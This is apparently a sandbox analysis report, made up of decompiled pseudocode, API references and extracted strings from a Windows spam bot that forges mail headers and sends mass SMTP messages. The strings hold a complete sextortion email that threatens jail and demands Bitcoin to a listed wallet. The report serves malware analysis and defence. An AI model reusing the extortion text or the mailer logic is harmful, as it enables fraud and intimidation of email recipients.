                                                                                                                                                                                                                                                                  										_t329 = _t346 + 0xc;
                                                                                                                                                                                                                                                                  										if(_t234 != 0) {
                                                                                                                                                                                                                                                                  											 *(_t302 - 0x20) = 3;
                                                                                                                                                                                                                                                                  										} else {
                                                                                                                                                                                                                                                                  											 *(_t302 - 0x20) = 0;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										goto L46;
                                                                                                                                                                                                                                                                  									case 1:
                                                                                                                                                                                                                                                                  										goto L46;
                                                                                                                                                                                                                                                                  									case 2:
                                                                                                                                                                                                                                                                  										L16:
                                                                                                                                                                                                                                                                  										__eax =  *(__ebp + 8);
                                                                                                                                                                                                                                                                  										__ecx = __ebp - 0x88;
                                                                                                                                                                                                                                                                  										__eax = wsprintfA(__ebp - 0x88, "<%s>",  *(__ebp + 8));
                                                                                                                                                                                                                                                                  										__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                  										__eax = __ebp - 0x490;
                                                                                                                                                                                                                                                                  										__eax = wsprintfA(__ebp - 0x490, "MAIL FROM: %s\r\n", __ebp - 0x88);
                                                                                                                                                                                                                                                                  										__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                  										 *(__ebp - 0x498) = __eax;
                                                                                                                                                                                                                                                                  										__ecx =  *(__ebp - 0x498);
                                                                                                                                                                                                                                                                  										__eax =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                  										__eax = E00901120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x498)); // executed
                                                                                                                                                                                                                                                                  										if(__eax != 0) {
                                                                                                                                                                                                                                                                  											 *(__ebp - 0x20) = 4;
                                                                                                                                                                                                                                                                  										} else {
                                                                                                                                                                                                                                                                  											 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										goto L46;
                                                                                                                                                                                                                                                                  									case 3:
                                                                                                                                                                                                                                                                  										L19:
                                                                                                                                                                                                                                                                  										__ecx =  *(__ebp + 8);
                                                                                                                                                                                                                                                                  										__eax = wsprintfA(__ebp - 0x490, "RCPT TO: <%s>\r\n",  *(__ebp + 8));
                                                                                                                                                                                                                                                                  										__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                  										 *(__ebp - 0x49c) = __eax;
                                                                                                                                                                                                                                                                  										__eax =  *(__ebp - 0x49c);
                                                                                                                                                                                                                                                                  										__ecx = __ebp - 0x490;
                                                                                                                                                                                                                                                                  										__eax = E00901120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x49c)); // executed
                                                                                                                                                                                                                                                                  										if(__eax != 0) {
                                                                                                                                                                                                                                                                  											 *(__ebp - 0x20) = 5;
                                                                                                                                                                                                                                                                  										} else {
                                                                                                                                                                                                                                                                  											 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										goto L46;
                                                                                                                                                                                                                                                                  									case 4:
                                                                                                                                                                                                                                                                  										L22:
                                                                                                                                                                                                                                                                  										__eax =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                  										__eax = E00901120( *(__ebp - 0x1c), "DATA\r\n", 0xffffffff); // executed
                                                                                                                                                                                                                                                                  										if(__eax != 0) {
                                                                                                                                                                                                                                                                  											 *(__ebp - 0x20) = 6;
                                                                                                                                                                                                                                                                  										} else {
                                                                                                                                                                                                                                                                  											 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										goto L46;
                                                                                                                                                                                                                                                                  									case 5:
                                                                                                                                                                                                                                                                  										goto L0;
                                                                                                                                                                                                                                                                  									case 6:
                                                                                                                                                                                                                                                                  										L45:
                                                                                                                                                                                                                                                                  										__ecx =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                  										__eax = E00901120( *(__ebp - 0x1c), "QUIT", 0xffffffff); // executed
                                                                                                                                                                                                                                                                  										 *(__ebp - 0x20) = 8;
                                                                                                                                                                                                                                                                  										goto L46;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  								break;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							break;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					L47:
                                                                                                                                                                                                                                                                  					 *(_t302 - 8) = 0 |  *(_t302 - 0x20) == 0x00000008;
                                                                                                                                                                                                                                                                  					__imp__#22( *((intOrPtr*)(_t302 - 0x1c)), 2); // executed
                                                                                                                                                                                                                                                                  					__imp__#3( *((intOrPtr*)(_t302 - 0x1c)));
                                                                                                                                                                                                                                                                  					return  *(_t302 - 8);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  			}

































                                                                                                                                                                                                                                                                  0x00901cab
                                                                                                                                                                                                                                                                  0x00901cab
                                                                                                                                                                                                                                                                  0x00901cab
                                                                                                                                                                                                                                                                  0x00901cc9
                                                                                                                                                                                                                                                                  0x00901cdd
                                                                                                                                                                                                                                                                  0x00901cea
                                                                                                                                                                                                                                                                  0x00901cfb
                                                                                                                                                                                                                                                                  0x00901d11
                                                                                                                                                                                                                                                                  0x00901d16
                                                                                                                                                                                                                                                                  0x00901d22
                                                                                                                                                                                                                                                                  0x00901d27
                                                                                                                                                                                                                                                                  0x00901d33
                                                                                                                                                                                                                                                                  0x00901d38
                                                                                                                                                                                                                                                                  0x00901d44
                                                                                                                                                                                                                                                                  0x00901d49
                                                                                                                                                                                                                                                                  0x00901d7c
                                                                                                                                                                                                                                                                  0x00901d94
                                                                                                                                                                                                                                                                  0x00901d99
                                                                                                                                                                                                                                                                  0x00901d9e
                                                                                                                                                                                                                                                                  0x00901dbc
                                                                                                                                                                                                                                                                  0x00901dec
                                                                                                                                                                                                                                                                  0x00901e04
                                                                                                                                                                                                                                                                  0x00901e09
                                                                                                                                                                                                                                                                  0x00901e0e
                                                                                                                                                                                                                                                                  0x00901e35
                                                                                                                                                                                                                                                                  0x00901e4d
                                                                                                                                                                                                                                                                  0x00901e52
                                                                                                                                                                                                                                                                  0x00901e57
                                                                                                                                                                                                                                                                  0x00901e7e
                                                                                                                                                                                                                                                                  0x00901e96
                                                                                                                                                                                                                                                                  0x00901e9b
                                                                                                                                                                                                                                                                  0x00901ea0
                                                                                                                                                                                                                                                                  0x00901ec8
                                                                                                                                                                                                                                                                  0x00901ee0
                                                                                                                                                                                                                                                                  0x00901ee5
                                                                                                                                                                                                                                                                  0x00901eea
                                                                                                                                                                                                                                                                  0x00901f14
                                                                                                                                                                                                                                                                  0x00901f2c
                                                                                                                                                                                                                                                                  0x00901f31
                                                                                                                                                                                                                                                                  0x00901f36
                                                                                                                                                                                                                                                                  0x00901f54
                                                                                                                                                                                                                                                                  0x00901f84
                                                                                                                                                                                                                                                                  0x00901f9c
                                                                                                                                                                                                                                                                  0x00901fa1
                                                                                                                                                                                                                                                                  0x00901fa6
                                                                                                                                                                                                                                                                  0x00901fbf
                                                                                                                                                                                                                                                                  0x00901fc4
                                                                                                                                                                                                                                                                  0x00901fc9
                                                                                                                                                                                                                                                                  0x00901fe2
                                                                                                                                                                                                                                                                  0x00901fe7
                                                                                                                                                                                                                                                                  0x00901fec
                                                                                                                                                                                                                                                                  0x00902008
                                                                                                                                                                                                                                                                  0x0090201c
                                                                                                                                                                                                                                                                  0x00902030
                                                                                                                                                                                                                                                                  0x00902044
                                                                                                                                                                                                                                                                  0x00902058
                                                                                                                                                                                                                                                                  0x0090206c
                                                                                                                                                                                                                                                                  0x00902080
                                                                                                                                                                                                                                                                  0x00902094
                                                                                                                                                                                                                                                                  0x009020a8
                                                                                                                                                                                                                                                                  0x009020bc
                                                                                                                                                                                                                                                                  0x009020d0
                                                                                                                                                                                                                                                                  0x009020e4
                                                                                                                                                                                                                                                                  0x009020f8
                                                                                                                                                                                                                                                                  0x0090210c
                                                                                                                                                                                                                                                                  0x00902121
                                                                                                                                                                                                                                                                  0x00902126
                                                                                                                                                                                                                                                                  0x0090212b
                                                                                                                                                                                                                                                                  0x00902136
                                                                                                                                                                                                                                                                  0x0090212d
                                                                                                                                                                                                                                                                  0x0090212d
                                                                                                                                                                                                                                                                  0x0090212d
                                                                                                                                                                                                                                                                  0x00901fee
                                                                                                                                                                                                                                                                  0x00901fee
                                                                                                                                                                                                                                                                  0x00901fee
                                                                                                                                                                                                                                                                  0x00901fcb
                                                                                                                                                                                                                                                                  0x00901fcb
                                                                                                                                                                                                                                                                  0x00901fcb
                                                                                                                                                                                                                                                                  0x00901fa8
                                                                                                                                                                                                                                                                  0x00901fa8
                                                                                                                                                                                                                                                                  0x00901fa8
                                                                                                                                                                                                                                                                  0x00901f38
                                                                                                                                                                                                                                                                  0x00901f38
                                                                                                                                                                                                                                                                  0x00901f38
                                                                                                                                                                                                                                                                  0x00901eec
                                                                                                                                                                                                                                                                  0x00901eec
                                                                                                                                                                                                                                                                  0x00901eec
                                                                                                                                                                                                                                                                  0x00901ea2
                                                                                                                                                                                                                                                                  0x00901ea2
                                                                                                                                                                                                                                                                  0x00901ea2
                                                                                                                                                                                                                                                                  0x00901e59
                                                                                                                                                                                                                                                                  0x00901e59
                                                                                                                                                                                                                                                                  0x00901e59
                                                                                                                                                                                                                                                                  0x00901e10
                                                                                                                                                                                                                                                                  0x00901e10
                                                                                                                                                                                                                                                                  0x00901e10
                                                                                                                                                                                                                                                                  0x00901da0
                                                                                                                                                                                                                                                                  0x00901da0
                                                                                                                                                                                                                                                                  0x00901da0
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00902159
                                                                                                                                                                                                                                                                  0x00901ab4
                                                                                                                                                                                                                                                                  0x00901ab9
                                                                                                                                                                                                                                                                  0x00901abc
                                                                                                                                                                                                                                                                  0x00901ac9
                                                                                                                                                                                                                                                                  0x00901ad0
                                                                                                                                                                                                                                                                  0x00901ad6
                                                                                                                                                                                                                                                                  0x00901ae5
                                                                                                                                                                                                                                                                  0x00901aea
                                                                                                                                                                                                                                                                  0x00901aef
                                                                                                                                                                                                                                                                  0x00901af6
                                                                                                                                                                                                                                                                  0x00901af9
                                                                                                                                                                                                                                                                  0x00901b08
                                                                                                                                                                                                                                                                  0x00901b15
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00901b1b
                                                                                                                                                                                                                                                                  0x00901b21
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00901b28
                                                                                                                                                                                                                                                                  0x00901b28
                                                                                                                                                                                                                                                                  0x00901b3c
                                                                                                                                                                                                                                                                  0x00901b71
                                                                                                                                                                                                                                                                  0x00901b77
                                                                                                                                                                                                                                                                  0x00901b7a
                                                                                                                                                                                                                                                                  0x00901b3e
                                                                                                                                                                                                                                                                  0x00901b4f
                                                                                                                                                                                                                                                                  0x00901b55
                                                                                                                                                                                                                                                                  0x00901b58
                                                                                                                                                                                                                                                                  0x00901b58
                                                                                                                                                                                                                                                                  0x00901b92
                                                                                                                                                                                                                                                                  0x00901b97
                                                                                                                                                                                                                                                                  0x00901b9c
                                                                                                                                                                                                                                                                  0x00901baa
                                                                                                                                                                                                                                                                  0x00901b9e
                                                                                                                                                                                                                                                                  0x00901b9e
                                                                                                                                                                                                                                                                  0x00901b9e
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00901bb6
                                                                                                                                                                                                                                                                  0x00901bb6
                                                                                                                                                                                                                                                                  0x00901bbf
                                                                                                                                                                                                                                                                  0x00901bc6
                                                                                                                                                                                                                                                                  0x00901bcc
                                                                                                                                                                                                                                                                  0x00901bdb
                                                                                                                                                                                                                                                                  0x00901be2
                                                                                                                                                                                                                                                                  0x00901be8
                                                                                                                                                                                                                                                                  0x00901beb
                                                                                                                                                                                                                                                                  0x00901bf1
                                                                                                                                                                                                                                                                  0x00901bff
                                                                                                                                                                                                                                                                  0x00901c03
                                                                                                                                                                                                                                                                  0x00901c0d
                                                                                                                                                                                                                                                                  0x00901c1b
                                                                                                                                                                                                                                                                  0x00901c0f
                                                                                                                                                                                                                                                                  0x00901c0f
                                                                                                                                                                                                                                                                  0x00901c0f
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00901c27
                                                                                                                                                                                                                                                                  0x00901c27
                                                                                                                                                                                                                                                                  0x00901c37
                                                                                                                                                                                                                                                                  0x00901c3d
                                                                                                                                                                                                                                                                  0x00901c40
                                                                                                                                                                                                                                                                  0x00901c46
                                                                                                                                                                                                                                                                  0x00901c4d
                                                                                                                                                                                                                                                                  0x00901c58
                                                                                                                                                                                                                                                                  0x00901c62
                                                                                                                                                                                                                                                                  0x00901c70
                                                                                                                                                                                                                                                                  0x00901c64
                                                                                                                                                                                                                                                                  0x00901c64
                                                                                                                                                                                                                                                                  0x00901c64
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00901c7c
                                                                                                                                                                                                                                                                  0x00901c83
                                                                                                                                                                                                                                                                  0x00901c87
                                                                                                                                                                                                                                                                  0x00901c91
                                                                                                                                                                                                                                                                  0x00901c9f
                                                                                                                                                                                                                                                                  0x00901c93
                                                                                                                                                                                                                                                                  0x00901c93
                                                                                                                                                                                                                                                                  0x00901c93
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0090213f
                                                                                                                                                                                                                                                                  0x00902146
                                                                                                                                                                                                                                                                  0x0090214a
                                                                                                                                                                                                                                                                  0x00902152
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00901af1
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00901af1
                                                                                                                                                                                                                                                                  0x00901acb
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00901acb
                                                                                                                                                                                                                                                                  0x00901ac9
                                                                                                                                                                                                                                                                  0x0090215e
                                                                                                                                                                                                                                                                  0x00902167
                                                                                                                                                                                                                                                                  0x00902170
                                                                                                                                                                                                                                                                  0x0090217a
                                                                                                                                                                                                                                                                  0x00902186
                                                                                                                                                                                                                                                                  0x00902186

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00901320: GetTickCount.KERNEL32 ref: 0090132A
                                                                                                                                                                                                                                                                    • Part of subcall function 00901320: srand.MSVCRT ref: 00901331
                                                                                                                                                                                                                                                                    • Part of subcall function 00901320: rand.MSVCRT ref: 00901353
                                                                                                                                                                                                                                                                    • Part of subcall function 00901320: sprintf.MSVCRT ref: 0090136E
                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00901CC9
                                                                                                                                                                                                                                                                    • Part of subcall function 00901490: GetLocalTime.KERNELBASE(?), ref: 00901528
                                                                                                                                                                                                                                                                    • Part of subcall function 00901490: GetTimeZoneInformation.KERNELBASE(00000000), ref: 00901563
                                                                                                                                                                                                                                                                    • Part of subcall function 00901490: wsprintfA.USER32 ref: 0090164E
                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(000007D0), ref: 00901CEA
                                                                                                                                                                                                                                                                    • Part of subcall function 00901490: FileTimeToLocalFileTime.KERNEL32(00000000,?), ref: 0090153B
                                                                                                                                                                                                                                                                    • Part of subcall function 00901490: FileTimeToSystemTime.KERNEL32(?,?), ref: 0090154C
                                                                                                                                                                                                                                                                  • rand.MSVCRT ref: 00901D11
                                                                                                                                                                                                                                                                  • rand.MSVCRT ref: 00901D22
                                                                                                                                                                                                                                                                  • rand.MSVCRT ref: 00901D33
                                                                                                                                                                                                                                                                  • rand.MSVCRT ref: 00901D44
                                                                                                                                                                                                                                                                    • Part of subcall function 00901390: rand.MSVCRT ref: 009013A0
                                                                                                                                                                                                                                                                    • Part of subcall function 00901390: rand.MSVCRT ref: 009013CD
                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00901D73
                                                                                                                                                                                                                                                                    • Part of subcall function 00901120: lstrlenA.KERNEL32(?), ref: 0090112D
                                                                                                                                                                                                                                                                    • Part of subcall function 00901120: send.WS2_32(?,?,000000FF,00000000), ref: 00901144
                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00901DE3
                                                                                                                                                                                                                                                                  • shutdown.WS2_32(000000FF,00000002), ref: 00902170
                                                                                                                                                                                                                                                                  • closesocket.WS2_32(000000FF), ref: 0090217A
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • Date: %s, xrefs: 00901EFF
                                                                                                                                                                                                                                                                  • Received: from %s ([%d.%d.%d.%d]) by %s with MailEnable ESMTP; %s, xrefs: 00901D67
                                                                                                                                                                                                                                                                  • If you want to avoid jail time, send 1400$ in Bitcoin (BTC) to my address., xrefs: 00902088
                                                                                                                                                                                                                                                                  • Subject: %s, xrefs: 00901EB3
                                                                                                                                                                                                                                                                  • I stole all your data and then I removed my trojan again, to not leave any traces., xrefs: 0090204C
                                                                                                                                                                                                                                                                  • Mime-Version: 1.0, xrefs: 00901FB6
                                                                                                                                                                                                                                                                  • READ OR GO TO JAIL!, xrefs: 00901EAE
                                                                                                                                                                                                                                                                  • Message-ID: <%s.%s@%s>, xrefs: 00901F6F
                                                                                                                                                                                                                                                                  • You can easily buy Bitcoin (BTC), just Google: "Where to buy Bitcoin (BTC)?"., xrefs: 0090209C
                                                                                                                                                                                                                                                                  • To: %s, xrefs: 00901E69
                                                                                                                                                                                                                                                                  • Check the sender of this email, I sent it from your email account., xrefs: 00902038
                                                                                                                                                                                                                                                                  • I KNOW EXACTLY ABOUT YOUR ILLEGAL ACTIVITIES!, xrefs: 00902060
                                                                                                                                                                                                                                                                  • Received: (qmail %s invoked by uid %s); %s, xrefs: 00901DD7
                                                                                                                                                                                                                                                                  • Hi, I keep the whole story short., xrefs: 00902010
                                                                                                                                                                                                                                                                  • From: %s, xrefs: 00901E20
                                                                                                                                                                                                                                                                  • %s.com, xrefs: 00901CBD
                                                                                                                                                                                                                                                                  • Content-type: text/plain;, xrefs: 00901FD9
                                                                                                                                                                                                                                                                  • Once I get the payment, I will remove everything, be sure, I keep my promises., xrefs: 009020EC
                                                                                                                                                                                                                                                                  • Your device got infected with my private trojan, it gave me access to all your files, accounts and contacts., xrefs: 00902024
                                                                                                                                                                                                                                                                  • Next time keep your device updated with the newest security patches.., xrefs: 00902100
                                                                                                                                                                                                                                                                  • My address is: bc1qfzlmekudmjnhj88yjl8277zkzu6v9c2r890fan, xrefs: 009020B0
                                                                                                                                                                                                                                                                  • You are given not more than 4 days after you have opened this email., xrefs: 009020D8
                                                                                                                                                                                                                                                                  • It won't take a long time to send your data with the proof of your activities to the police., xrefs: 00902074
                                                                                                                                                                                                                                                                  • Yes, that's how the address looks like, just copy and paste it, the address is (CaSe-SenSitiVE)., xrefs: 009020C4
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.518157757.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518125135.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518204360.0000000000903000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518254273.0000000000904000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518294900.0000000000905000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_900000_2350331867.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: rand$Time$wsprintf$File$Local$CountInformationSleepSystemTickZoneclosesocketlstrlensendshutdownsprintfsrand
                                                                                                                                                                                                                                                                  • String ID: %s.com$Check the sender of this email, I sent it from your email account.$Content-type: text/plain;$Date: %s$From: %s$Hi, I keep the whole story short.$I KNOW EXACTLY ABOUT YOUR ILLEGAL ACTIVITIES!$I stole all your data and then I removed my trojan again, to not leave any traces.$If you want to avoid jail time, send 1400$ in Bitcoin (BTC) to my address.$It won't take a long time to send your data with the proof of your activities to the police.$Message-ID: <%s.%s@%s>$Mime-Version: 1.0$My address is: bc1qfzlmekudmjnhj88yjl8277zkzu6v9c2r890fan$Next time keep your device updated with the newest security patches..$Once I get the payment, I will remove everything, be sure, I keep my promises.$READ OR GO TO JAIL!$Received: (qmail %s invoked by uid %s); %s$Received: from %s ([%d.%d.%d.%d]) by %s with MailEnable ESMTP; %s$Subject: %s$To: %s$Yes, that's how the address looks like, just copy and paste it, the address is (CaSe-SenSitiVE).$You are given not more than 4 days after you have opened this email.$You can easily buy Bitcoin (BTC), just Google: "Where to buy Bitcoin (BTC)?".$Your device got infected with my private trojan, it gave me access to all your files, accounts and contacts.
                                                                                                                                                                                                                                                                  • API String ID: 1336957093-2376026895
                                                                                                                                                                                                                                                                  • Opcode ID: f7c01f47c0fea3e7de30ffc738cc7712f3b3ec35b8059afbe0603a10b817ea87
                                                                                                                                                                                                                                                                  • Instruction ID: 8dbf663ccdd6f284a1cf3113881d3fc55e1ccfcd8db5e15889fbf99575a87ac9
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f7c01f47c0fea3e7de30ffc738cc7712f3b3ec35b8059afbe0603a10b817ea87
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 46C1C3B2D44218AFDB10DB90DC46FEE737DAB98304F048598FA0DA61C1E779AB548F61
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  C-Code - Quality: 88%
                                                                                                                                                                                                                                                                  			E00902370(void* _a4) {
                                                                                                                                                                                                                                                                  				short _v524;
                                                                                                                                                                                                                                                                  				signed int _v528;
                                                                                                                                                                                                                                                                  				short _v1052;
                                                                                                                                                                                                                                                                  				long _v1572;
                                                                                                                                                                                                                                                                  				short _v2092;
                                                                                                                                                                                                                                                                  				char _v2356;
                                                                                                                                                                                                                                                                  				int _v2360;
                                                                                                                                                                                                                                                                  				int _v2364;
                                                                                                                                                                                                                                                                  				char* _t59;
                                                                                                                                                                                                                                                                  				char* _t66;
                                                                                                                                                                                                                                                                  				int _t67;
                                                                                                                                                                                                                                                                  				signed int _t70;
                                                                                                                                                                                                                                                                  				signed int _t74;
                                                                                                                                                                                                                                                                  				signed int _t76;
                                                                                                                                                                                                                                                                  				signed int _t78;
                                                                                                                                                                                                                                                                  				int _t83;
                                                                                                                                                                                                                                                                  				int _t85;
                                                                                                                                                                                                                                                                  				signed int _t88;
                                                                                                                                                                                                                                                                  				void* _t122;
                                                                                                                                                                                                                                                                  				void* _t134;
                                                                                                                                                                                                                                                                  				void* _t139;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				memcpy( &_v2356, _a4, 0x41 << 2);
                                                                                                                                                                                                                                                                  				srand(GetTickCount());
                                                                                                                                                                                                                                                                  				E00902620(0,  &_v2092, 0, 0x104);
                                                                                                                                                                                                                                                                  				E00902620( &_v1572,  &_v1572, 0, 0x104);
                                                                                                                                                                                                                                                                  				E00902620( &_v1572,  &_v1052, 0, 0x104);
                                                                                                                                                                                                                                                                  				E00902620( &_v1572,  &_v524, 0, 0x104);
                                                                                                                                                                                                                                                                  				memset("[84.17.52.51]", 0, 0x1f4);
                                                                                                                                                                                                                                                                  				_t59 = E009017D0(); // executed
                                                                                                                                                                                                                                                                  				strcpy("[84.17.52.51]", _t59);
                                                                                                                                                                                                                                                                  				ExpandEnvironmentStringsW(L"%temp%",  &_v2092, 0x104);
                                                                                                                                                                                                                                                                  				mbstowcs( &_v1572,  &_v2356, 0x105);
                                                                                                                                                                                                                                                                  				wsprintfW( &_v1052, L"%sn.txt",  &_v1572);
                                                                                                                                                                                                                                                                  				_t66 = E009018D0(0,  &_v1052, 0); // executed
                                                                                                                                                                                                                                                                  				_t67 = atoi(_t66);
                                                                                                                                                                                                                                                                  				_t134 = _t122 + 0x7c;
                                                                                                                                                                                                                                                                  				_v528 = _t67;
                                                                                                                                                                                                                                                                  				if(_v528 <= 0) {
                                                                                                                                                                                                                                                                  					ExitThread(0);
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					goto L1;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				while(1) {
                                                                                                                                                                                                                                                                  					L1:
                                                                                                                                                                                                                                                                  					Sleep(0x3e8); // executed
                                                                                                                                                                                                                                                                  					E00902620( &_v524,  &_v524, 0, 0x104);
                                                                                                                                                                                                                                                                  					E00902620( &_v524, "C:\Users\hardz\AppData\Local\Temp\336362908233226.jpg", 0, 0x104);
                                                                                                                                                                                                                                                                  					_t70 = rand();
                                                                                                                                                                                                                                                                  					asm("cdq");
                                                                                                                                                                                                                                                                  					wsprintfW( &_v524, L"%s%d.txt",  &_v1572, _t70 % _v528 + 1);
                                                                                                                                                                                                                                                                  					_t74 = rand();
                                                                                                                                                                                                                                                                  					asm("cdq");
                                                                                                                                                                                                                                                                  					_t76 = rand();
                                                                                                                                                                                                                                                                  					asm("cdq");
                                                                                                                                                                                                                                                                  					_t78 = rand();
                                                                                                                                                                                                                                                                  					asm("cdq");
                                                                                                                                                                                                                                                                  					wsprintfW("C:\Users\hardz\AppData\Local\Temp\336362908233226.jpg", L"%s\\%d%d%d.jpg",  &_v2092, _t78 % 0x7fff + 0x3e8, _t76 % 0x7fff + 0x3e8, _t74 % 0x7fff + 0x3e8);
                                                                                                                                                                                                                                                                  					E009018D0(1,  &_v524, "C:\Users\hardz\AppData\Local\Temp\336362908233226.jpg"); // executed
                                                                                                                                                                                                                                                                  					_t139 = _t134 + 0x4c;
                                                                                                                                                                                                                                                                  					_t83 = PathFileExistsW("C:\Users\hardz\AppData\Local\Temp\336362908233226.jpg"); // executed
                                                                                                                                                                                                                                                                  					if(_t83 == 0) {
                                                                                                                                                                                                                                                                  						goto L7;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_v2364 = 0;
                                                                                                                                                                                                                                                                  					while(_v2364 < 0xbb8) {
                                                                                                                                                                                                                                                                  						CreateThread(0, 0, E009021D0, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                  						_t88 = rand();
                                                                                                                                                                                                                                                                  						asm("cdq");
                                                                                                                                                                                                                                                                  						Sleep(_t88 % 0x32 + 0x32); // executed
                                                                                                                                                                                                                                                                  						_v2364 = _v2364 + 1;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					DeleteFileW("C:\Users\hardz\AppData\Local\Temp\336362908233226.jpg");
                                                                                                                                                                                                                                                                  					L7:
                                                                                                                                                                                                                                                                  					_t85 = atoi(E009018D0(0,  &_v1052, 0));
                                                                                                                                                                                                                                                                  					_t134 = _t139 + 0x10;
                                                                                                                                                                                                                                                                  					_v2360 = _t85;
                                                                                                                                                                                                                                                                  					if(_v2360 >= 1) {
                                                                                                                                                                                                                                                                  						continue;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					ExitProcess(0);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  			}
























                                                                                                                                                                                                                                                                  0x00902389
                                                                                                                                                                                                                                                                  0x00902392
                                                                                                                                                                                                                                                                  0x009023a8
                                                                                                                                                                                                                                                                  0x009023be
                                                                                                                                                                                                                                                                  0x009023d4
                                                                                                                                                                                                                                                                  0x009023ea
                                                                                                                                                                                                                                                                  0x009023fe
                                                                                                                                                                                                                                                                  0x00902406
                                                                                                                                                                                                                                                                  0x00902411
                                                                                                                                                                                                                                                                  0x0090242a
                                                                                                                                                                                                                                                                  0x00902443
                                                                                                                                                                                                                                                                  0x0090245e
                                                                                                                                                                                                                                                                  0x00902472
                                                                                                                                                                                                                                                                  0x0090247b
                                                                                                                                                                                                                                                                  0x00902480
                                                                                                                                                                                                                                                                  0x00902483
                                                                                                                                                                                                                                                                  0x00902490
                                                                                                                                                                                                                                                                  0x0090260c
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00902496
                                                                                                                                                                                                                                                                  0x00902496
                                                                                                                                                                                                                                                                  0x0090249b
                                                                                                                                                                                                                                                                  0x009024af
                                                                                                                                                                                                                                                                  0x009024c3
                                                                                                                                                                                                                                                                  0x009024cb
                                                                                                                                                                                                                                                                  0x009024d0
                                                                                                                                                                                                                                                                  0x009024ee
                                                                                                                                                                                                                                                                  0x009024f7
                                                                                                                                                                                                                                                                  0x009024fc
                                                                                                                                                                                                                                                                  0x0090250b
                                                                                                                                                                                                                                                                  0x00902510
                                                                                                                                                                                                                                                                  0x0090251f
                                                                                                                                                                                                                                                                  0x00902524
                                                                                                                                                                                                                                                                  0x00902544
                                                                                                                                                                                                                                                                  0x0090255b
                                                                                                                                                                                                                                                                  0x00902560
                                                                                                                                                                                                                                                                  0x00902568
